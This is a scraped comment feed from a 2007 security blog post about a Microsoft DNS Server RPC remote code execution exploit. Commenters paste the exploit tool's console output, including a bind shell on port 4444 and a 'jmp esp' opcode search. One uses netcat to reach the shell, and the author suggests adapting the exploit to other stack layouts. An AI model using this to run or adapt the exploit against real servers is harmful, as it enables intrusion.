Comentarios en: Microsoft DNS Server Remote Code execution Exploit http://blog.48bits.com/2007/04/16/microsoft-dns-server-remote-code-execution-exploit/ 48Bits ... The one and a half architecture land. Thu, 09 Feb 2012 23:02:12 +0000 hourly 1 http://wordpress.org/?v=3.3.1 Por: PoWeRGuArD http://blog.48bits.com/2007/04/16/microsoft-dns-server-remote-code-execution-exploit/comment-page-1/#comment-39649 PoWeRGuArD Thu, 10 May 2007 10:28:11 +0000 http://blog.48bits.com/?p=92#comment-39649 hi all friend, I use to exploit my server 2003. Exploit done result is message.. C:\>dnstest -h 127.0.0.1 -------------------------------------------------------------- Microsoft Dns Server local & remote RPC Exploit code Exploit code by Andres Tarasco & Mario Ballano Tested against Windows 2000 server SP4 and Windows 2003 SP2 -------------------------------------------------------------- [+] Remote Host identified as Windows 2003 [-] No port selected. Trying Ninja sk1llz [+] Binding to ncacn_ip_tcp:127.0.0.1 [+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0 [+] RPC binding string: ncacn_ip_tcp:127.0.0.1[1027] [+] Dynamic DNS rpc port found (1027) [+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:127.0.0.1[10 27] [+] RpcBindingFromStringBinding success [+] Sending Exploit code to DnssrvOperation() [+] Now try to connect to port 4444 [-] Return code: 0 Okey... afeter other computer in lan run nc (netcat) and => nc 192.168.1.100 4444 but not connect , where i mistake? Thanks, all hi all friend,

I use to exploit my server 2003.
Exploit done result is message..

C:\>dnstest -h 127.0.0.1
————————————————————–
Microsoft Dns Server local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 server SP4 and Windows 2003 SP2
————————————————————–

[+] Remote Host identified as Windows 2003
[-] No port selected. Trying Ninja sk1llz
[+] Binding to ncacn_ip_tcp:127.0.0.1
[+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
[+] RPC binding string: ncacn_ip_tcp:127.0.0.1[1027]
[+] Dynamic DNS rpc port found (1027)
[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:127.0.0.1[10
27]
[+] RpcBindingFromStringBinding success
[+] Sending Exploit code to DnssrvOperation()
[+] Now try to connect to port 4444
[-] Return code: 0

Okey… afeter other computer in lan run nc (netcat) and => nc 192.168.1.100 4444 but not connect ,
where i mistake?

Thanks, all

]]> Por: Mario http://blog.48bits.com/2007/04/16/microsoft-dns-server-remote-code-execution-exploit/comment-page-1/#comment-37023 Mario Sat, 28 Apr 2007 21:30:09 +0000 http://blog.48bits.com/?p=92#comment-37023 Hi, Seems that old versions of DNS Server have different compilation than newers, so perhaps the stack layout is not the same, the exploit was tested only with updated OSes, you can modify yourself the exploit in order to get it working :-) Cheers, Mario Hi,

Seems that old versions of DNS Server have different compilation than newers, so perhaps the stack layout is not the same, the exploit was tested only with updated OSes, you can modify yourself the exploit in order to get it working :-)

Cheers,

Mario

]]> Por: siggame http://blog.48bits.com/2007/04/16/microsoft-dns-server-remote-code-execution-exploit/comment-page-1/#comment-36626 siggame Thu, 26 Apr 2007 09:08:24 +0000 http://blog.48bits.com/?p=92#comment-36626 C:\Documents and Settings>dnstest2 -h 127.0.0.1 -------------------------------------------------------------- Microsoft Dns Server local & remote RPC Exploit code Exploit code by Andres Tarasco & Mario Ballano Tested against Windows 2000 server SP4 and Windows 2003 SP2 -------------------------------------------------------------- [+] Remote Host identified as Windows 2000 [-] No port selected. Trying Ninja sk1llz [+] Binding to ncacn_ip_tcp:127.0.0.1 [+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0 [+] RPC binding string: ncacn_ip_tcp:222.122.46.150[1062] [+] Dynamic DNS rpc port found (1062) [+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:127.0.0.1[10 62] [+] RpcBindingFromStringBinding success [+] Searching local opcodes at Kernel32.dll (0x77e50000) [+] Searching 0x100000 bytes [+] Opcode " jmp esp" at address 0x [+] Please report this offset to us so we can update the exploit =) [+] Sending Exploit code to DnssrvOperation() [+] Now try to connect to port 4444 [-] RPC Server reported exception 0x6be = 1726 [-] Looks like remote RPC server crashed :/ why DNS's close? C:\Documents and Settings>dnstest2 -h 127.0.0.1
————————————————————–
Microsoft Dns Server local & remote RPC Exploit code
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 server SP4 and Windows 2003 SP2
————————————————————–

[+] Remote Host identified as Windows 2000
[-] No port selected. Trying Ninja sk1llz
[+] Binding to ncacn_ip_tcp:127.0.0.1
[+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
[+] RPC binding string: ncacn_ip_tcp:222.122.46.150[1062]
[+] Dynamic DNS rpc port found (1062)
[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:127.0.0.1[10
62]
[+] RpcBindingFromStringBinding success
[+] Searching local opcodes at Kernel32.dll (0x77e50000)
[+] Searching 0×100000 bytes
[+] Opcode ” jmp esp” at address 0x
[+] Please report this offset to us so we can update the exploit =)
[+] Sending Exploit code to DnssrvOperation()
[+] Now try to connect to port 4444
[-] RPC Server reported exception 0x6be = 1726
[-] Looks like remote RPC server crashed :/

why DNS’s close?

]]> Por: svch0st http://blog.48bits.com/2007/04/16/microsoft-dns-server-remote-code-execution-exploit/comment-page-1/#comment-35847 svch0st Mon, 23 Apr 2007 07:08:36 +0000 http://blog.48bits.com/?p=92#comment-35847 Veo que seguís siendo putos amos... Solo recordaros que Bender es Dios y que siempre hemos de alabarle y respertarle bajo cualquier circunstanciamen. Un saludo y a ver cuando nos tomamos unas cañotas... Veo que seguís siendo putos amos…
Solo recordaros que Bender es Dios y que siempre hemos de alabarle y respertarle bajo cualquier circunstanciamen.
Un saludo y a ver cuando nos tomamos unas cañotas…

]]> Por: ANELKAOS http://blog.48bits.com/2007/04/16/microsoft-dns-server-remote-code-execution-exploit/comment-page-1/#comment-35009 ANELKAOS Wed, 18 Apr 2007 01:35:16 +0000 http://blog.48bits.com/?p=92#comment-35009 Muy bueno Mario :) os lo he puesto aquí: http://foro.elhacker.net/index.php/topic,161994.0.html Lo estuve probando esta tarde pero sobre 2k3+SP2 con lo que.... [+] Now try to connect to port 4444 [-] RPC Server reported exception 0x6be = 1726 [-] Looks like remote RPC server crashed :/ Un saludo. Muy bueno Mario :) os lo he puesto aquí:

http://foro.elhacker.net/index.php/topic,161994.0.html

Lo estuve probando esta tarde pero sobre 2k3+SP2 con lo que….

[+] Now try to connect to port 4444
[-] RPC Server reported exception 0x6be = 1726
[-] Looks like remote RPC server crashed :/

Un saludo.

]]>